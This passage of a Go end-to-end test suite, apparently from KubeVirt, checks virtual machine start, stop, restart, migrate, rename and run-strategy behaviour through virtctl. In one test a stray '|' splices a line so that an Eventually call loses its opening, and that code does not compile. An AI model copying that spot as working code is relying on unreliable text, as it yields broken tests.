It("[test_id:1527]should not update the VirtualMachineInstance spec if Running", func() {
newVM := newVirtualMachine(true)
Eventually(func() bool {
newVM, err = virtClient.VirtualMachine(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return newVM.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
By("Updating the VM template spec")
newVM, err = virtClient.VirtualMachine(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
updatedVM := newVM.DeepCopy()
updatedVM.Spec.Template.Spec.Domain.Resources.Requests = v13.ResourceList{
v13.ResourceMemory: resource.MustParse("4096Ki"),
}
updatedVM, err := virtClient.VirtualMachine(updatedVM.Namespace).Update(updatedVM)
Expect(err).ToNot(HaveOccurred())
By("Expecting the old VirtualMachineInstance spec still running")
vmi, err := virtClient.VirtualMachineInstance(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
vmiMemory := vmi.Spec.Domain.Resources.Requests.Memory()
vmMemory := newVM.Spec.Template.Spec.Domain.Resources.Requests.Memory()
Expect(vmiMemory.Cmp(*vmMemory)).To(Equal(0))
By("Restarting the VM")
newVM = stopVM(newVM)
newVM = startVM(newVM)
By("Expecting updated spec running")
vmi, err = virtClient.VirtualMachineInstance(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
vmiMemory = vmi.Spec.Domain.Resources.Requests.Memory()
vmMemory = updatedVM.Spec.Template.Spec.Domain.Resources.Requests.Memory()
Expect(vmiMemory.Cmp(*vmMemory)).To(Equal(0))
})
It("[test_id:1528]should survive guest shutdown, multiple times", func() {
By("Creating new VM, not running")
newVM := newVirtualMachine(false)
newVM = startVM(newVM)
var vmi *v1.VirtualMachineInstance
for i := 0; i < 3; i++ {
currentVMI, err := virtClient.VirtualMachineInstance(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
By("Getting the running VirtualMachineInstance")
Eventually(func() bool {
vmi, err = virtClient.VirtualMachineInstance(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return vmi.Status.Phase == v1.Running
}, 240*time.Second, 1*time.Second).Should(BeTrue())
By("Obtaining the serial console")
expecter, err := tests.LoggedInCirrosExpecter(vmi)
Expect(err).ToNot(HaveOccurred())
defer expecter.Close()
By("Guest shutdown")
_, err = expecter.ExpectBatch([]expect.Batcher{
&expect.BSnd{S: "sudo poweroff\n"},
&expect.BExp{R: "The system is going down NOW!"},
}, 240*time.Second)
Expect(err).ToNot(HaveOccurred())
By("waiting for the controller to replace the shut-down vmi with a new instance")
Eventually(func() bool {
vmi, err = virtClient.VirtualMachineInstance(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
// Almost there, a new instance should be spawned soon
if errors.IsNotFound(err) {
return false
}
Expect(err).ToNot(HaveOccurred())
// If the UID of the vmi changed we see the new vmi
if vmi.UID != currentVMI.UID {
return true
}
return false
}, 240*time.Second, 1*time.Second).Should(BeTrue(), "No new VirtualMachineInstance instance showed up")
By("VMI should run the VirtualMachineInstance again")
}
})
It("should set the Ready condition on VM", func() {
vm := newVirtualMachine(false)
vmReadyConditionStatus := func() k8sv1.ConditionStatus {
updatedVm, err := virtClient.VirtualMachine(vm.Namespace).Get(vm.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
cond := controller.NewVirtualMachineConditionManager().
GetCondition(updatedVm, v1.VirtualMachineReady)
if cond == nil {
return ""
}
return cond.Status
}
Expect(vmReadyConditionStatus()).To(BeEmpty())
startVM(vm)
Eventually(vmReadyConditionStatus, 300*time.Second, 1*time.Second).
Should(Equal(k8sv1.ConditionTrue))
stopVM(vm)
Eventually(vmReadyConditionStatus, 300*time.Second, 1*time.Second).
Should(BeEmpty())
})
Context("Using virtctl interface", func() {
It("[test_id:1529]should start a VirtualMachineInstance once", func() {
By("getting a VM")
newVM := newVirtualMachine(false)
By("Invoking virtctl start")
startCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_START, "--namespace", newVM.Namespace, newVM.Name)
Expect(startCommand()).To(Succeed())
By("Getting the status of the VM")
Eventually(func() bool {
newVM, err = virtClient.VirtualMachine(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return newVM.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
By("Getting the running VirtualMachineInstance")
Eventually(func() bool {
vmi, err := virtClient.VirtualMachineInstance(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return vmi.Status.Phase == v1.Running
}, 240*time.Second, 1*time.Second).Should(BeTrue())
By("Ensuring a second invocation should fail")
err = startCommand()
Expect(err).To(HaveOccurred())
Expect(err.Error()).To(Equal(fmt.Sprintf(`Error starting VirtualMachine Operation cannot be fulfilled on virtualmachine.kubevirt.io "%s": VM is already running`, newVM.Name)))
})
It("[test_id:1530]should stop a VirtualMachineInstance once", func() {
By("getting a VM")
newVM := newVirtualMachine(true)
By("Ensuring VM is running")
Eventually(func() bool {
newVM, err = virtClient.VirtualMachine(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return newVM.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
By("Invoking virtctl stop")
stopCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_STOP, "--namespace", newVM.Namespace, newVM.Name)
Expect(stopCommand()).To(Succeed())
By("Ensuring VM is not running")
Eventually(func() bool {
newVM, err = virtClient.VirtualMachine(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return !newVM.Status.Ready && !newVM.Status.Created
}, 360*time.Second, 1*time.Second).Should(BeTrue())
By("Ensuring the VirtualMachineInstance is removed")
Eventually(func() error {
_, err = virtClient.VirtualMachineInstance(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
// Expect a 404 error
return err
}, 240*time.Second, 1*time.Second).Should(HaveOccurred())
By("Ensuring a second invocation should fail")
err = stopCommand()
Expect(err).ToNot(Succeed())
Expect(err.Error()).To(Equal(fmt.Sprintf(`Error stopping VirtualMachine Operation cannot be fulfilled on virtualmachine.kubevirt.io "%s": VM is not running`, newVM.Name)))
})
It("[test_id:3007]Should force restart a VM with terminationGracePeriodSeconds>0", func() {
By("getting a VM with high TerminationGracePeriod")
newVMI := tests.NewRandomVMIWithEphemeralDisk(tests.ContainerDiskFor(tests.ContainerDiskFedora))
gracePeriod := int64(600)
newVMI.Spec.TerminationGracePeriodSeconds = &gracePeriod
newVM := tests.NewRandomVirtualMachine(newVMI, true)
_, err := virtClient.VirtualMachine(newVM.Namespace).Create(newVM)
Expect(err).ToNot(HaveOccurred())
waitForVMIStart(virtClient, newVMI)
oldCreationTime := newVMI.ObjectMeta.CreationTimestamp
oldVMIUuid := newVM.ObjectMeta.UID
By("Invoking virtctl --force restart")
forceRestart := tests.NewRepeatableVirtctlCommand(vm.COMMAND_RESTART, "--namespace", newVM.Namespace, "--force", newVM.Name, "--grace-period=0")
err = forceRestart()
Expect(err).ToNot(HaveOccurred())
zeroGracePeriod := int64(0)
// Checks if the old VMI Pod still exists after force-restart command
Eventually(func() string {
pod, err := tests.GetRunningPodByLabel(string(oldVMIUuid), v1.CreatedByLabel, newVM.Namespace, "")
if err != nil {
return err.Error()
}
if pod.GetDeletionGracePeriodSeconds() == &zeroGracePeriod && pod.GetDeletionTimestamp() != nil {
return "old VMI Pod still not deleted"
}
return ""
}, 120*time.Second, 1*time.Second).Should(ContainSubstring("failed to find pod"))
waitForNewVMI(virtClient, newVMI)
By("Comparing the new CreationTimeStamp with the old one")
newVMI, err = virtClient.VirtualMachineInstance(newVM.Namespace).Get(newVM.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
Expect(oldCreationTime).ToNot(Equal(newVMI.ObjectMeta.CreationTimestamp))
Expect(oldVMIUuid).ToNot(Equal(newVMI.ObjectMeta.UID))
})
Context("Using RunStrategyAlways", func() {
It("[test_id:3163]should stop a running VM", func() {
By("creating a VM with RunStrategyAlways")
virtualMachine := newVirtualMachineWithRunStrategy(v1.RunStrategyAlways)
By("Waiting for VM to be ready")
Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
By("Invoking virtctl stop")
stopCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_STOP, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
Expect(stopCommand()).To(Succeed())
By("Ensuring the VirtualMachineInstance is removed")
Eventually(func() error {
_, err = virtClient.VirtualMachineInstance(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
// Expect a 404 error
return err
}, 240*time.Second, 1*time.Second).Should(HaveOccurred())
newVM, err := virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
Expect(newVM.Spec.RunStrategy).ToNot(BeNil())
Expect(*newVM.Spec.RunStrategy).To(Equal(v1.RunStrategyHalted))
Expect(len(newVM.Status.StateChangeRequests)).To(Equal(0))
})
It("[test_id:3164]should restart a running VM", func() {
By("creating a VM with RunStrategyAlways")
virtualMachine := newVirtualMachineWithRunStrategy(v1.RunStrategyAlways)
By("Waiting for VM to be ready")
Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
By("Getting VM's UUID")
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
currentUUID := virtualMachine.UID
By("Invoking virtctl restart")
restartCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_RESTART, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
Expect(restartCommand()).To(Succeed())
By("Ensuring the VirtualMachineInstance is restarted")
Eventually(func() types.UID {
nextVMI, err := virtClient.VirtualMachineInstance(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
if err != nil {
// a 404 could happen normally while the VMI transitions
if !errors.IsNotFound(err) {
Expect(err).ToNot(HaveOccurred())
}
// If there's no VMI, just return the last known UUID
return currentUUID
}
return nextVMI.UID
}, 240*time.Second, 1*time.Second).ShouldNot(Equal(currentUUID))
newVM, err := virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
Expect(newVM.Spec.RunStrategy).ToNot(BeNil())
Expect(*newVM.Spec.RunStrategy).To(Equal(v1.RunStrategyAlways))
// StateChangeRequest might still exist until the new VMI is created
// But it must eventually be cleared
Eventually(func() int {
newVM, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return len(newVM.Status.StateChangeRequests)
}, 240*time.Second, 1*time.Second).Should(Equal(0),
"New VMI was created, but StateChangeRequest was never cleared")
})
It("[test_id:3165]should restart a succeeded VMI", func() {
By("creating a VM with RunStategyRunning")
virtualMachine := newVirtualMachineWithRunStrategy(v1.RunStrategyAlways)
By("Waiting for VM to be ready")
Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
vmi, err := virtClient.VirtualMachineInstance(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
expecter, err := tests.LoggedInCirrosExpecter(vmi)
Expect(err).ToNot(HaveOccurred())
defer expecter.Close()
By("Issuing a poweroff command from inside VM")
_, err = expecter.ExpectBatch([]expect.Batcher{
&expect.BSnd{S: "sudo poweroff\n"},
}, 10*time.Second)
Expect(err).ToNot(HaveOccurred())
By("Getting VM's UUID")
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
currentUUID := virtualMachine.UID
By("Ensuring the VirtualMachineInstance is restarted")
Eventually(func() types.UID {
nextVMI, err := virtClient.VirtualMachineInstance(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
if err != nil {
// a 404 could happen normally while the VMI transitions
if !errors.IsNotFound(err) {
Expect(err).ToNot(HaveOccurred())
}
// If there's no VMI, just return the last known UUID
return currentUUID
}
return nextVMI.UID
}, 240*time.Second, 1*time.Second).ShouldNot(Equal(currentUUID))
})
It("[test_id:4119]should migrate a running VM", func() {
By("creating a VM with RunStrategyAlways")
virtualMachine := newVirtualMachineWithRunStrategy(v1.RunStrategyAlways)
By("Waiting for VM to be ready")
Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
By("Invoking virtctl migrate")
migrateCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_MIGRATE, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
Expect(migrateCommand()).To(Succeed())
By("Ensuring the VirtualMachineInstance is migrated")
Eventually(func() bool {
nextVMI, err := virtClient.VirtualMachineInstance(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return nextVMI.Status.MigrationState != nil && nextVMI.Status.MigrationState.Completed
}, 240*time.Second, 1*time.Second).Should(BeTrue())
})
})
Context("Using RunStrategyRerunOnFailure", func() {
It("[test_id:2186] should stop a running VM", func() {
By("creating a VM with RunStrategyRerunOnFailure")
virtualMachine := newVirtualMachineWithRunStrategy(v1.RunStrategyRerunOnFailure)
stopCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_STOP, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
By("Waiting for VM to be ready")
Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
By("Invoking virtctl stop")
err = stopCommand()
Expect(err).ToNot(HaveOccurred())
By("Ensuring the VirtualMachineInstance is removed")
Eventually(func() error {
_, err = virtClient.VirtualMachineInstance(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
// Expect a 404 error
return err
}, 240*time.Second, 1*time.Second).Should(HaveOccurred())
newVM, err := virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
Expect(newVM.Spec.RunStrategy).ToNot(BeNil())
Expect(*newVM.Spec.RunStrategy).To(Equal(v1.RunStrategyHalted))
By("Ensuring stateChangeRequests list is cleared")
Expect(len(newVM.Status.StateChangeRequests)).To(Equal(0))
})
It("[test_id:2187] should restart a running VM", func() {
By("creating a VM with RunStrategyRerunOnFailure")
virtualMachine := newVirtualMachineWithRunStrategy(v1.RunStrategyRerunOnFailure)
restartCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_RESTART, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
By("Waiting for VM to be ready")
Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
By("Getting VM's UUID")
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
currentUUID := virtualMachine.UID
By("Invoking virtctl restart")
err = restartCommand()
Expect(err).ToNot(HaveOccurred())
By("Ensuring the VirtualMachineInstance is restarted")
Eventually(func() types.UID {
nextVMI, err := virtClient.VirtualMachineInstance(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
if err != nil {
// a 404 could happen normally while the VMI transitions
if !errors.IsNotFound(err) {
Expect(err).ToNot(HaveOccurred())
}
// If there's no VMI, just return the last known UUID
return currentUUID
}
return nextVMI.UID
}, 240*time.Second, 1*time.Second).ShouldNot(Equal(currentUUID))
newVM, err := virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
Expect(newVM.Spec.RunStrategy).ToNot(BeNil())
Expect(*newVM.Spec.RunStrategy).To(Equal(v1.RunStrategyRerunOnFailure))
By("Ensuring stateChangeRequests list gets cleared")
// StateChangeRequest might still exist until the new VMI is created
// But it must eventually be cleared
Eventually(func() int {
newVM, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return len(newVM.Status.StateChangeRequests)
}, 240*time.Second, 1*time.Second).Should(Equal(0),
"New VMI was created, but StateChangeRequest was never cleared")
})
It("[test_id:2188] should not remove a succeeded VMI", func() {
By("creating a VM with RunStrategyRerunOnFailure")
virtualMachine := newVirtualMachineWithRunStrategy(v1.RunStrategyRerunOnFailure)
By("Waiting for VMI to be ready")
Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
vmi, err := virtClient.VirtualMachineInstance(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
expecter, err := tests.LoggedInCirrosExpecter(vmi)
Expect(err).ToNot(HaveOccurred())
defer expecter.Close()
By("Issuing a poweroff command from inside VM")
_, err = expecter.ExpectBatch([]expect.Batcher{
&expect.BSnd{S: "sudo poweroff\n"},
}, 10*time.Second)
Expect(err).ToNot(HaveOccurred())
By("Ensuring the VirtualMachineInstance enters Succeeded phase")
Eventually(func() v1.VirtualMachineInstancePhase {
vmi, err := virtClient.VirtualMachineInstance(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return vmi.Status.Phase
}, 240*time.Second, 1*time.Second).Should(Equal(v1.Succeeded))
// At this point, explicitly test that a start command will delete an existing
// VMI in the Succeeded phase.
By("Invoking virtctl start")
restartCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_START, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
err = restartCommand()
Expect(err).ToNot(HaveOccurred())
By("Waiting for StartRequest to be cleared")
Eventually(func() int {
newVM, err := virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return len(newVM.Status.StateChangeRequests)
}, 240*time.Second, 1*time.Second).Should(Equal(0), "StateChangeRequest was never cleared")
By("Waiting for VM to be ready") | }, 360*time.Second, 1*time.Second).Should(BeTrue())
})
})
Context("Using RunStrategyHalted", func() {
It("[test_id:2037] should start a stopped VM", func() {
By("creating a VM with RunStrategyHalted")
virtualMachine := newVirtualMachineWithRunStrategy(v1.RunStrategyHalted)
startCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_START, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
err = startCommand()
Expect(err).ToNot(HaveOccurred())
By("Waiting for VM to be ready")
Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
newVM, err := virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
Expect(newVM.Spec.RunStrategy).ToNot(BeNil())
Expect(*newVM.Spec.RunStrategy).To(Equal(v1.RunStrategyAlways))
By("Ensuring stateChangeRequests list is cleared")
Expect(len(newVM.Status.StateChangeRequests)).To(Equal(0))
})
})
Context("Using RunStrategyManual", func() {
It("[test_id:2036] should start", func() {
By("creating a VM with RunStrategyManual")
virtualMachine := newVirtualMachineWithRunStrategy(v1.RunStrategyManual)
startCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_START, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
err = startCommand()
Expect(err).ToNot(HaveOccurred())
By("Waiting for VM to be ready")
Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
newVM, err := virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
Expect(newVM.Spec.RunStrategy).ToNot(BeNil())
Expect(*newVM.Spec.RunStrategy).To(Equal(v1.RunStrategyManual))
By("Ensuring stateChangeRequests list is cleared")
Expect(len(newVM.Status.StateChangeRequests)).To(Equal(0))
})
It("[test_id:2189] should stop", func() {
By("creating a VM with RunStrategyManual")
virtualMachine := newVirtualMachineWithRunStrategy(v1.RunStrategyManual)
startCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_START, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
err = startCommand()
Expect(err).ToNot(HaveOccurred())
By("Waiting for VM to be ready")
Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
stopCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_STOP, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
err = stopCommand()
Expect(err).ToNot(HaveOccurred())
By("Ensuring the VirtualMachineInstance is removed")
Eventually(func() bool {
_, err = virtClient.VirtualMachineInstance(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
return errors.IsNotFound(err)
}, 240*time.Second, 1*time.Second).Should(BeTrue())
By("Ensuring stateChangeRequests list is cleared")
Eventually(func() bool {
newVM, err := virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
if err != nil {
return false
}
if newVM.Spec.RunStrategy == nil || *newVM.Spec.RunStrategy != v1.RunStrategyManual {
return false
}
return len(newVM.Status.StateChangeRequests) == 0
}, 30*time.Second, time.Second).Should(BeTrue())
})
It("[test_id:2035] should restart", func() {
By("creating a VM with RunStrategyManual")
virtualMachine := newVirtualMachineWithRunStrategy(v1.RunStrategyManual)
startCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_START, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
stopCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_STOP, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
restartCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_RESTART, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
By("Invoking virtctl restart should fail")
err = restartCommand()
Expect(err).To(HaveOccurred())
By("Invoking virtctl start")
err = startCommand()
Expect(err).NotTo(HaveOccurred())
By("Waiting for VM to be ready")
Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready
}, 240*time.Second, 1*time.Second).Should(BeTrue())
By("Invoking virtctl stop")
err = stopCommand()
Expect(err).ToNot(HaveOccurred())
By("Ensuring the VirtualMachineInstance is stopped")
Eventually(func() bool {
vm, err := virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
if err != nil {
Expect(err).ToNot(HaveOccurred())
}
return vm.Status.Created
}, 240*time.Second, 1*time.Second).Should(BeFalse())
By("Waiting state change request to clear for stopped VM")
Eventually(func() int {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return len(virtualMachine.Status.StateChangeRequests)
}, 240*time.Second, 1*time.Second).Should(Equal(0))
By("Invoking virtctl start")
err = startCommand()
Expect(err).ToNot(HaveOccurred())
By("Waiting for VM to be ready")
Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
By("Getting VM's UUID")
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
currentUUID := virtualMachine.UID
By("Invoking virtctl restart")
err = restartCommand()
Expect(err).ToNot(HaveOccurred())
By("Ensuring the VirtualMachineInstance is restarted")
Eventually(func() types.UID {
nextVMI, err := virtClient.VirtualMachineInstance(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
if err != nil {
// a 404 could happen normally while the VMI transitions
if !errors.IsNotFound(err) {
Expect(err).ToNot(HaveOccurred())
}
// If there's no VMI, just return the last known UUID
return currentUUID
}
return nextVMI.UID
}, 240*time.Second, 1*time.Second).ShouldNot(Equal(currentUUID))
newVM, err := virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
Expect(newVM.Spec.RunStrategy).ToNot(BeNil())
Expect(*newVM.Spec.RunStrategy).To(Equal(v1.RunStrategyManual))
By("Ensuring stateChangeRequests list gets cleared")
// StateChangeRequest might still exist until the new VMI is created
// But it must eventually be cleared
Eventually(func() int {
newVM, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return len(newVM.Status.StateChangeRequests)
}, 240*time.Second, 1*time.Second).Should(Equal(0),
"New VMI was created, but StateChangeRequest was never cleared")
})
It("[test_id:2190] should not remove a succeeded VMI", func() {
By("creating a VM with RunStrategyManual")
virtualMachine := newVirtualMachineWithRunStrategy(v1.RunStrategyManual)
startCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_START, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
err = startCommand()
Expect(err).ToNot(HaveOccurred())
By("Waiting for VM to be ready")
Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
vmi, err := virtClient.VirtualMachineInstance(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
expecter, err := tests.LoggedInCirrosExpecter(vmi)
Expect(err).ToNot(HaveOccurred())
defer expecter.Close()
By("Issuing a poweroff command from inside VM")
_, err = expecter.ExpectBatch([]expect.Batcher{
&expect.BSnd{S: "sudo poweroff\n"},
}, 10*time.Second)
Expect(err).ToNot(HaveOccurred())
By("Ensuring the VirtualMachineInstance enters Succeeded phase")
Eventually(func() v1.VirtualMachineInstancePhase {
vmi, err := virtClient.VirtualMachineInstance(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return vmi.Status.Phase
}, 240*time.Second, 1*time.Second).Should(Equal(v1.Succeeded))
// At this point, explicitly test that a start command will delete an existing
// VMI in the Succeeded phase.
By("Invoking virtctl start")
restartCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_START, "--namespace", virtualMachine.Namespace, virtualMachine.Name)
err = restartCommand()
Expect(err).ToNot(HaveOccurred())
By("Waiting for StartRequest to be cleared")
Eventually(func() int {
newVM, err := virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return len(newVM.Status.StateChangeRequests)
}, 240*time.Second, 1*time.Second).Should(Equal(0), "StateChangeRequest was never cleared")
By("Waiting for VM to be ready")
Eventually(func() bool {
virtualMachine, err = virtClient.VirtualMachine(virtualMachine.Namespace).Get(virtualMachine.Name, &v12.GetOptions{})
Expect(err).ToNot(HaveOccurred())
return virtualMachine.Status.Ready
}, 360*time.Second, 1*time.Second).Should(BeTrue())
})
})
})
Context("VM rename", func() {
var vm1 *v1.VirtualMachine
BeforeEach(func() {
vm1 = newVirtualMachine(false)
})
It("should rename a stopped VM only once", func() {
renameCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_RENAME, vm1.Name, vm1.Name+"new",
"--namespace", vm1.Namespace)
Expect(renameCommand()).To(Succeed())
Expect(renameCommand()).ToNot(Succeed())
})
It("should rename a stopped VM", func() {
renameCommand := tests.NewRepeatableVirtctlCommand(vm.COMMAND_RENAME, vm1.Name, vm1.Name+"new",
"--namespace", vm1.Namespace)
Expect(renameCommand()).To(Succeed())
})
It("should reject renaming a running VM", func() {
